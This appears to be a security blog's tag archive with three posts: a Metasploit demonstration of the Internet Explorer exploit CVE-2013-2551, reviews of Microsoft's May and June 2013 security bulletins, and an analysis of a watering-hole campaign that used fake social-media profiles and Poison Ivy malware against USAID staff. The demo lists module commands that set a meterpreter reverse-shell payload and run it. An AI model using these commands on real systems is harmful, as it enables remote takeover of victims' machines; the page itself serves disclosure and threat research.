Tag Archives: Microsoft

CVE-2013-2551 MS13-037 Internet Explorer Vulnerability Metasploit Demo

Timeline :

Vulnerability exploited during Pwn2Own 2013 by VUPEN the 2013-03-07
Vulnerability corrected by vendor the 2013-05-14
Details on the vulnerability provided by VUPEN the 2013-05-22
Metasploit PoC provided the 2013-06-12

PoC provided by :

Nicolas Joly
4B5F5F4B
juan vazquez

Reference(s) :

CVE-2013-2551
OSVDB-91197
MS13-037
BID-58570
VUPEN Advanced Exploitation of Internet Explorer 10 / Windows 8 Overflow (Pwn2Own 2013)

Affected version(s) :

Microsoft Internet Explorer 6 through 10

Tested on Windows 7 Integral with :

Internet Explorer 8
ntdll.dll

Description :

This module exploits an integer overflow vulnerability on Internet Explorer. The vulnerability exists in the handling of the dashstyle.array length for vml shapes on the vgx.dll module. This module has been tested successfully on Windows 7 SP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target to use an info leak to disclose the ntdll.dll base address is provided. This target requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1 installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001).

Commands :

use exploit/windows/browser/ms13_037_svg_dashstyle
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

Microsoft June 2013 Patch Tuesday Review

Microsoft has release, June 11th 2013, during his June Patch Tuesday, one updated security advisory, one new security advisory and five security bulletins. On the five security bulletins one of them has a Critical security rating.

Microsoft Security Advisory 2755801

MSA-2755801,released during September 2012, has been updated. The security advisory is regarding updates for vulnerabilities in Adobe Flash Player in Internet Explorer 10. KB2847928 has been released for supported editions of Windows 8, Windows Server 2012, and Windows RT. The update addresses the vulnerabilities described in Adobe Security bulletin APSB13-16.

Microsoft Security Advisory 2854544

MSA-2854544 concern improvements of cryptography and digital certificate handling in Windows. KB2813430 expand Certificate Trust List (CTL) functionality for managing private PKI environments on Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, and Windows RT.

MS13-047 Cumulative Security Update for Internet Explorer

MS13-047 security update, classified as Critical, allowing remote code execution, is the fix for nineteen privately reported vulnerabilities in Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, and Internet Explorer 10. CVE-2013-3126 (2.0 CVSS base score) and CVE-2013-3123 (9.3 CVSS base score) were discovered and privately reported by [email protected], working with HP’s Zero Day Initiative. CVE-2013-3110 (9.3 CVSS base score) was discovered and privately reported by Scott Bell of Security-Assessment.com. CVE-2013-3111 (9.3 CVSS base score) and CVE-2013-3120 (9.3 CVSS base score) were discovered and privately reported by SkyLined, working with HP’s Zero Day Initiative. CVE-2013-3112 (9.3 CVSS base score), CVE-2013-3121 (9.3 CVSS base score), CVE-2013-3122 (9.3 CVSS base score) and CVE-2013-3141 (9.3 CVSS base score) were discovered and privately reported by anonymous researcher’s, working with HP’s Zero Day Initiative. CVE-2013-3113 (9.3 CVSS base score), CVE-2013-3114 (9.3 CVSS base score), CVE-2013-3116 (9.3 CVSS base score) and CVE-2013-3117 (9.3 CVSS base score) were discovered and privately reported by Ivan Fratric and Ben Hawkes of the Google Security Team. CVE-2013-3118 (9.3 CVSS base score) and CVE-2013-3125 (9.3 CVSS base score) were discovered and privately reported by Omair, working with HP’s Zero Day Initiative. CVE-2013-3119 (9.3 CVSS base score) was discovered and privately reported by Stephen Fewer of Harmony Security, working with HP’s Zero Day Initiative. CVE-2013-3124 (9.3 CVSS base score) and CVE-2013-3125 (9.3 CVSS base score) were discovered and privately reported by Omair, working with HP’s Zero Day Initiative, and by Amol Naik also working with HP’s Zero Day Initiative. CVE-2013-3139 (9.3 CVSS base score) was discovered and privately reported by an unknown security researcher. CVE-2013-3142 (9.3 CVSS base score) was discovered and privately reported by Toan Pham Van, working with HP’s Zero Day Initiative.

MS13-048 Vulnerability in Windows Kernel Could Allow Information Disclosure

MS13-048 security update, classified as Important, allowing information disclosure, is the fix for one privately reported vulnerability in Windows Kernel. CVE-2013-3136 (4.4 CVSS base score) was discovered and privately reported by Mateusz “j00ru” Jurczyk of Google Inc.

MS13-049 Vulnerability in Kernel-Mode Driver Could Allow Denial of Service

MS13-049 security update, classified as Important, allowing denial of service, is the fix for one privately reported vulnerability in Windows Kernel-Mode Driver. CVE-2013-3138 (7.1 CVSS base score) was discovered and privately reported by an anonymous security researcher.

MS13-050 Vulnerability in Windows Print Spooler Components Could Allow Elevation of Privilege

MS13-050 security update, classified as Important, allowing elevation of privilege, is the fix for one privately reported vulnerability in Windows Print Spooler Components. CVE-2013-1339 (9.0 CVSS base score) was discovered and privately reported by an anonymous security researcher.

MS13-051 Vulnerability in Microsoft Office Could Allow Remote Code Execution

MS13-051 security update, classified as Important, allowing remote code execution, is the fix for one privately reported vulnerability in Microsoft Office. CVE-2013-1331 (9.3 CVSS base score) was discovered and privately reported by Andrew Lyons and Neel Mehta of Google Inc.

Microsoft May 2013 Patch Tuesday Review

Microsoft has release, May 14th 2013, during his May Patch Tuesday, two updated security advisories, two new security advisories and ten security bulletins. On the ten security bulletins two of them have a Critical security rating.

Microsoft Security Advisory 2755801

MSA-2755801,released during September 2012, has been updated. The security advisory is regarding updates for vulnerabilities in Adobe Flash Player in Internet Explorer 10. KB2840613 has been released for supported editions of Windows 8, Windows Server 2012, and Windows RT. The update addresses the vulnerabilities described in Adobe Security bulletin APSB13-14.

Microsoft Security Advisory 2820197

MSA-2820197 update includes kill bits to prevent Honeywell Enterprise Buildings Integrator and SymmetrE and ComfortPoint Open Manager ActiveX controls from being run in Internet Explorer.

Microsoft Security Advisory 2846338

MSA-2846338 concern a privately reported security vulnerability, CVE-2013-1303 (9.3 CVSS base score), in Microsoft Malware Protection Engine that could allow remote code execution if the Microsoft Malware Protection Engine scans a specially crafted file. This vulnerability has been publicly disclosed as a denial of service. Only x64-based versions of the Malware Protection Engine are affected.

Microsoft Security Advisory 2847140

MSA-2847140, released May 3rd 2013, has been updated. The security advisory concern Microsoft Internet Explorer 8 remote code execution vulnerability (CVE-2013-1347) used in targeted attacks against United States Department of Labor (DOL) Site Exposure Matrices (SEM) and other websites. Microsoft has issue MS13-038 to address the vulnerability.

MS13-037 Cumulative Security Update for Internet Explorer

MS13-037 security update, classified as Critical, allowing remote code execution, is the fix for 11 privately reported vulnerabilities in Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, and Internet Explorer 10. CVE-2013-1297 (4.3 CVSS base score) was discovered and privately reported by Yosuke Hasegawa. CVE-2013-0811 (9.3 CVSS base score) was discovered and privately reported by Jose Antonio Vazquez Gonzalez, working with VeriSign iDefense Labs. CVE-2013-1306 (9.3 CVSS base score) and CVE-2013-1309 (9.3 CVSS base score) were discovered and privately reported by SkyLined, working with HP’s Zero Day Initiative. CVE-2013-1307 (9.3 CVSS base score) was discovered and privately reported by Ivan Fratric of the Google Security Team. CVE-2013-1308 (9.3 CVSS base score) was discovered and privately reported by [email protected], working with HP’s Zero Day Initiative. CVE-2013-1310 (9.3 CVSS base score) was discovered and privately reported by Yuhong Bao. CVE-2013-1311 (9.3 CVSS base score) was discovered and privately reported by Scott Bell of Security-Assessment.com. CVE-2013-1312 (9.3 CVSS base score) was discovered and privately reported by Stephen Fewer of Harmony Security. CVE-2013-1313 (9.3 CVSS base score) was discovered and privately reported by VUPEN Security (Pwn2Own 2013), working with HP’s Zero Day Initiative.

MS13-038 Security Update for Internet Explorer

MS13-038 security update, classified as Critical, allowing remote code execution, is the fix for one publicly disclosed vulnerability in Internet Explorer 8. CVE-2013-1347 (9.3 CVSS base score), was discovered exploited in the wild in targeted attacks.

MS13-039 Vulnerability in HTTP.sys Could Allow Denial of Service

MS13-039 security update, classified as Important, allowing denial of service, is the fix for one privately reported vulnerability in Microsoft Windows. CVE-2013-1305 (5.0 CVSS base score) was discovered and privately reported by Marek Kroemeke, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, AKAT-1, working with HP’s Zero Day Initiative.

MS13-040 Vulnerabilities in .NET Framework Could Allow Spoofing

MS13-040 security update, classified as Important, allowing spoofing, is the fix for one privately reported vulnerability and one publicly disclosed vulnerability in .NET Framework. CVE-2013-1336 (5.0 CVSS base score) was discovered and privately reported by James Forshaw of Context Information Security. CVE-2013-1337 (7.5 CVSS base score) was publicly disclosed.

MS13-041 Vulnerability in Lync Could Allow Remote Code Execution

MS13-041 security update, classified as Important, allowing remote code execution, is the fix for one privately reported vulnerability in Microsoft Lync. CVE-2013-1302 (9.3 CVSS base score) was discovered and privately reported.

MS13-042 Vulnerabilities in Microsoft Publisher Could Allow Remote Code Execution

MS13-042 security update, classified as Important, allowing remote code execution, is the fix for 11 privately reported vulnerabilities in Microsoft Office. CVE-2013-1316 (9.3 CVSS base score), CVE-2013-1317 (9.3 CVSS base score), CVE-2013-1318 (10.0 CVSS base score), CVE-2013-1319 (10.0 CVSS base score), CVE-2013-1320 (10.0 CVSS base score), CVE-2013-1321 (9.3 CVSS base score), CVE-2013-1322 (10.0 CVSS base score), CVE-2013-1323 (9.3 CVSS base score), CVE-2013-1327 (9.3 CVSS base score), CVE-2013-1328 (9.3 CVSS base score) and CVE-2013-1329 (9.3 CVSS base score) were discovered and privately reported by Will Dormann of the CERT/CC.

MS13-043 Vulnerability in Microsoft Word Could Allow Remote Code Execution

MS13-043 security update, classified as Important, allowing remote code execution, is the fix for one privately reported vulnerability in Microsoft Office. CVE-2013-1335 (9.3 CVSS base score) was discovered and privately reported by Will Dormann of the CERT/CC.

MS13-044 Vulnerability in Microsoft Visio Could Allow Information Disclosure

MS13-044 security update, classified as Important, allowing information disclosure, is the fix for one privately reported vulnerability in Microsoft Office. CVE-2013-1301 (4.3 CVSS base score) was discovered and privately reported by Timur Yunusov of Positive Technologies.

MS13-045 Vulnerability in Windows Essentials Could Allow Information Disclosure

MS13-045 security update, classified as Important, allowing information disclosure, is the fix for one privately reported vulnerability in Windows Essentials. CVE-2013-0096 (6.8 CVSS base score) was discovered and privately reported by Andrea Micalizzi, working with Beyond Security’s SecuriTeam Secure Disclosure team.

MS13-046 Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege

MS13-046 security update, classified as Important, allowing elevation of privilege, is the fix for three privately reported vulnerabilities in Microsoft Windows. CVE-2013-1332 (7.2 CVSS base score) was discovered and privately reported by Gynvael Coldwind and Mateusz “j00ru” Jurczyk of Google Inc. CVE-2013-1333 (7.2 CVSS base score) was discovered and privately reported by Qihoo 360 Security Center. CVE-2013-1334 (7.2 CVSS base score) was discovered and privately reported by an anonymous researcher, working with the iDefense VCP.

DOL Watering Hole Campaign and Sexy Swedish Soccer Supporter

As I explained in my previous blog post, nine websites were involved in the DOL watering hole campaign. The first involved website was University Research Co. Cambodia (www[.]urccambodia[.]org) from 2013-03-15 to 2013-04-29. This website came out of the context of other websites used in this watering hole campaign.

The Better Health Services (BHS) is a USAID-funded health systems strengthening project in Cambodia that began in January 2009 and runs through December 2013. The BHS project’s goals dovetail with the mission of the Ministry of Health as stated in the Cambodian Health Strategic Plan 2008-2015 (HSP2) “to provide stewardship for the entire health sector and to ensure a supportive environment for increased demand and equitable access to quality health services in order that all the peoples of Cambodia are able to achieve the highest level of health and well-being.”

By continuing my researches on the gathered information’s found on dol[.]ns01[.]us backend and focusing on all information’s related to University Research Co. Cambodia website, I found some interesting behaviours.

In all the gathered information’s I firstly found a connection referer to www[.]urccambodia[.]org, this referer was a shortened URL http://t[.]co/RnWc0Z13Sc. Doing a google research on this shortened URL we can find a tweet from @natividad_usaid, dating from 2013-03-18.

natividad_usaid-1

If you observe @natividad_usaid, you will see that the account activity has begun the March 18th and finished the April 10th. Mostly all of the tweet have provide link to www[.]urccambodia[.]org, during the time of this website infection. Some twitter users were directly contacted in order to incite them to click to the link and most of these users were related to USAID (US Agency for International Development).

natividad_usaid-2

 

natividad_usaid-5

natividad_usaid-4

But most interesting is the profile description of this account and especially the shortened URL goo[.]gl/kpb7r how lead to “this is my pic.scr” file hosted on Dropbox. By analyzing this file it appear that it is Poison Ivy (504a32e123194a298018129404a1374e).

natividad_usaid-profile

dropbox-poisonivy

A malwr analysis of this sample reveal that “microsoftUpdate[.]ns1[.]name” is the contacted C&C server and that “conime.exe” file is also created. This C&C server is the same as mentioned by Crowdstrike, AlienVault and other security researchers or vendors, but from “bookmark.png” payload involved in Internet Explorer 8 0day (CVE-2013-1347).

It seem that this twitter account was only created and used to incite USAID twitter users to be infected through a www[.]urccambodia[.]org visit.

By continuing to analyze www[.]urccambodia[.]org related gathered information’s, I found a second connection referer to www[.]urccambodia[.]org. This referer is the Facebook profile of Kelly Black “http://www.facebook.com/kelly.black.92754“.

This sexy lady, posing with a friend, pretend to have work for USAID, to have study at UVA College of Arts & Sciences Alumni, to live in Washington, District of Columbia and to be from Springfield, Illinois.

kelly-black-facebook-1

Kelly Black account activity has start and stopped the same day, the March 24th. Most of the posts of this “lady” are link to infected www[.]urccambodia[.]org website and/or to project around sanitation of Mekong waters organized by US organization’s.

kelly-black-facebook-2

kelly-black-facebook-3

kelly-black-facebook-4

kelly-black-facebook-5kelly-black-facebook-5

This sexy lady has, in one day of activity, 41 friends and most of these friends are from USAID or from others organization’s.

Now the funny part of the story, on the picture you can see two beautiful women with a yellow T-shirt and they seem to enjoy the live. One of the friends of Kelly Black was interesting to know which of the two she was, and the “bad guys” toke the time to respond to him 🙂

kelly-black-facebook-6

But I was intrigued by this picture and decided to compare this one on Internet, and ho miracle these ladies are not US women from Springfield, Illinois, but Swedish supporters who were photographed during European soccer cup in Poland/Ukraine.

You can find this photo through TinEye or Google pictures comparison services. This photo is present on different medias, ActionPlus, DailyMail and bunch of other websites.